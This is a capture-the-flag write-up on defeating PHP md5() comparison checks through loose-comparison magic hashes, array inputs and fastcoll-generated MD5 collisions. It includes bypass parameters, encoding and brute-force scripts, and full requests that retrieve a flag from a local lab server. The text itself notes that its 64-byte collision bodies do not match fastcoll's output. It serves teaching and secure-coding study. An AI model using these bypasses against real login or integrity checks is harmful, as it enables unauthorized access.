ps:

== and != : if the operand types differ, PHP first tries to convert them to a common type and only then compares the values, so the result is a value comparison after type juggling ("0e1" == "0e2" is true, because both are numeric strings equal to 0).
=== and !== : the values are compared only when the types already match; no conversion is attempted, so "0e1" === "0e2" is false.

0x00

if($_POST['param1']!=$_POST['param2'] && md5($_POST['param1'])==md5($_POST['param2'])){
    die("seclab507{php_is_weak_____}");
}

Bypass: param1=240610708&param2=QNKCDZO

Why it works: md5('240610708') = 0e462097431906509019562988736854 and md5('QNKCDZO') = 0e830400451993494058024219903391. Both are "0e" followed only by digits, so == treats them as numeric strings in scientific notation and compares 0 == 0. The raw parameters themselves are compared as plain strings (QNKCDZO is not numeric), so param1 != param2 also holds.
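
The following is an added example, not code from the original post. It emulates PHP's loose string comparison in Python (the regular expression `_NUMERIC`, and the helper names `php_loose_equal`, `is_magic_hash`, `bypasses_0x00`, `first_magic` and `brute_force_candidates` are all mine), checks the level 0x00 condition against the pair above, and shows the shape of a brute-force search for further "magic" hashes. The emulation ignores PHP's whitespace tolerance in numeric strings and uses float comparison, which is enough for hashes but not a full reimplementation of PHP's number parsing.

```python
import hashlib
import itertools
import re
import string

# PHP's numeric-string grammar: optional sign, digits with optional fraction,
# optional exponent. Whitespace handling varies between PHP versions and is
# deliberately left out here, so this emulation is conservative.
_NUMERIC = re.compile(r"^[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?$")


def php_loose_equal(a: str, b: str) -> bool:
    """Emulate PHP's == for two strings.

    If both strings are numeric, PHP compares them as numbers; otherwise it
    compares them byte for byte. This rule is unchanged in PHP 8, which only
    altered number-vs-non-numeric-string comparisons.
    """
    if _NUMERIC.match(a) and _NUMERIC.match(b):
        return float(a) == float(b)
    return a == b


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def is_magic_hash(hexdigest: str) -> bool:
    """A 'magic' hash is '0e' followed only by decimal digits: as a numeric
    string it is 0 * 10**n, which == 0 and therefore == every other magic hash."""
    return hexdigest.startswith("0e") and hexdigest[2:].isdigit()


def bypasses_0x00(p1: str, p2: str) -> bool:
    """The level 0x00 condition: p1 != p2 loosely, but md5(p1) == md5(p2) loosely."""
    return not php_loose_equal(p1, p2) and php_loose_equal(md5_hex(p1), md5_hex(p2))


def first_magic(candidates):
    """Return the first candidate whose MD5 is a magic hash, or None."""
    for cand in candidates:
        if is_magic_hash(md5_hex(cand)):
            return cand
    return None


def brute_force_candidates(prefix: str = "", max_len: int = 8):
    """Generate prefix + alphanumeric suffixes of increasing length. Roughly one
    in 3.4e8 MD5 digests is magic ((1/256) * (10/16)**30), so a real search
    needs hundreds of millions of hashes; run it offline, never per request."""
    alphabet = string.ascii_letters + string.digits
    for n in range(1, max_len + 1):
        for tail in itertools.product(alphabet, repeat=n):
            yield prefix + "".join(tail)


if __name__ == "__main__":
    for p1, p2 in [("240610708", "QNKCDZO"), ("240610708", "s878926199a")]:
        print(p1, md5_hex(p1), p2, md5_hex(p2), "bypass:", bypasses_0x00(p1, p2))
```

`first_magic(brute_force_candidates("flag"))` is how you would hunt for a new magic string with a chosen prefix; expect it to take a long time, which is why known pairs such as the one above get reused in CTFs.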

0x01

if($_POST['param1']!==$_POST['param2'] && md5($_POST['param1'])===md5($_POST['param2'])){
    die("seclab507{php_is_weak_____}");
}

=== is a strict comparison: the md5() return values are not type-juggled but compared as strings, so magic hashes no longer help. Bypass with arrays instead: with param1[] and param2[] both values arrive as arrays, md5() of an array returns NULL (with a warning) on PHP 5 and 7, and NULL === NULL is true, while the two arrays hold different elements so param1 !== param2 also holds.
Bypass: param1[]=123&param2[]=1231
(On PHP 8 md5() throws a TypeError when given an array, so this trick no longer works there.)

0x02

if((string)$_POST['param1']!==(string)$_POST['param2'] && md5($_POST['param1'])===md5($_POST['param2'])){
    die("seclab507{php_is_weak_____}");
}

var_dump(md5('240610708') === md5('QNKCDZO'));  // bool(false): the two magic hashes are different strings

The array trick fails here too: (string) casting an array yields the literal string "Array" (with an "Array to string conversion" notice), so both parameters become "Array" and the !== check is false.
Bypass: a real MD5 collision, i.e. two different byte strings with the same MD5 digest.

Use fastcoll to generate two files with the same MD5:

E:\ctf工具\ctf工具\加解密工具\MD5碰撞\fastcoll_v1.0.0.5>fastcoll_v1.0.0.5.exe -o p1.txt p2.txt
MD5 collision generator v1.5
by Marc Stevens (http://www.win.tue.nl/hashclash/)

Using output filenames: 'p1.txt' and 'p2.txt'
Using initial value: 0123456789abcdeffedcba9876543210

Generating first block: .......
Generating second block: S11...................
Running time: 1.892 s

Because the files contain many non-printable bytes, URL-encode them before putting them into the request body:

#! /usr/bin/env python2
# -*- coding: utf-8 -*-
# Author: Archerx
# @time: 2018/10/6 09:13 PM

import urllib

# Read both collision files as raw bytes; they are not valid text.
with open('p1.txt', 'rb') as f1, open('p2.txt', 'rb') as f2:
    # urllib.quote percent-encodes every byte outside [A-Za-z0-9_.-/], which is
    # what application/x-www-form-urlencoded needs (space -> %20, NUL -> %00).
    # Python 3 equivalent: urllib.parse.quote(data, safe='').
    param1 = urllib.quote(f1.read())
    param2 = urllib.quote(f2.read())

# Paste this body straight into the POST request; do not URL-encode it again.
print('param1=' + param1 + '&param2=' + param2)

Local test (send it with Burp; HackBar would URL-encode the body a second time and break the payload):

POST /md5_test/ HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/md5_test/
Content-Type: application/x-www-form-urlencoded
Content-Length: 317
Connection: close
Upgrade-Insecure-Requests: 1

param1=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2&param2=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2

Or send the request directly with curl:

C:\Users\徐超>curl -v http://127.0.0.1/md5_test/ -H "Cookie: PHPSESSID=True" --data "param1=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2&param2=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2"
*   Trying 127.0.0.1...
* TCP_NODELAY set
* Connected to 127.0.0.1 (127.0.0.1) port 80 (#0)
> POST /md5_test/ HTTP/1.1
> Host: 127.0.0.1
> User-Agent: curl/7.55.1
> Accept: */*
> Content-Length: 317
> Content-Type: application/x-www-form-urlencoded
>
* upload completely sent off: 317 out of 317 bytes
< HTTP/1.1 200 OK
< Date: Sat, 06 Oct 2018 13:25:41 GMT
< Server: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.5.38
< X-Powered-By: PHP/5.5.38
< Content-Length: 27
< Content-Type: text/html
<
seclab507{php_is_weak_____}* Connection #0 to host 127.0.0.1 left intact
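
Before sending a collision payload it is worth checking it the way the server will see it. The script below is an added example, not part of the original post: it decodes the two request bodies from the requests above exactly as PHP does (percent-decoding to raw bytes), reports where they differ and whether their MD5 digests match, and is a Python 3 port of the URL-encoding step (`quote(data, safe='')`). The constants `PARAM1`/`PARAM2` hold the page's own bodies; the function names are mine. Note that those bodies are 64 bytes each, a single MD5 block, whereas fastcoll as run above emits two blocks (128 bytes per file); the check handles either length.

```python
import hashlib
from urllib.parse import quote, unquote_to_bytes

# The two percent-encoded bodies from the request on this page (the page's own
# data, reproduced here so the check runs offline).
PARAM1 = ("M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B"
          "%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2")
PARAM2 = ("M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B"
          "%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2")


def form_encode(data: bytes) -> str:
    """Python 3 port of the page's urllib.quote() step: percent-encode every byte
    outside the unreserved set so raw collision bytes survive a form body."""
    return quote(data, safe="")


def form_decode(encoded: str) -> bytes:
    """What the PHP runtime does to the body before md5() sees it."""
    return unquote_to_bytes(encoded)


def diff_offsets(a: bytes, b: bytes) -> list:
    """Byte offsets at which the two messages differ (tail counted if lengths differ)."""
    common = [i for i, (x, y) in enumerate(zip(a, b)) if x != y]
    return common + list(range(min(len(a), len(b)), max(len(a), len(b))))


def check_0x02(p1: bytes, p2: bytes) -> dict:
    """Mirror the level 0x02 condition: (string) values differ, md5() values match."""
    h1 = hashlib.md5(p1).hexdigest()
    h2 = hashlib.md5(p2).hexdigest()
    return {
        "different_strings": p1 != p2,
        "same_md5": h1 == h2,
        "md5": (h1, h2),
        "diff_offsets": diff_offsets(p1, p2),
        "lengths": (len(p1), len(p2)),
    }


if __name__ == "__main__":
    p1, p2 = form_decode(PARAM1), form_decode(PARAM2)
    for key, value in check_0x02(p1, p2).items():
        print(f"{key}: {value}")
    # Re-encoding must reproduce the body exactly. A second round of encoding
    # (what HackBar does) turns every '%' into '%25' and the server then hashes
    # the ASCII text of the encoding instead of the collision bytes.
    print("round-trip ok:", form_encode(p1) == PARAM1)
    print("double-encoded prefix:", form_encode(PARAM1.encode())[:24])
```

If `same_md5` is False the pair is not a collision for the bytes the server actually receives, which is the first thing to suspect when a request like the one above comes back without the flag.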

An interesting site on MD5 collisions: https://www.mscs.dal.ca/~selinger/md5collision/
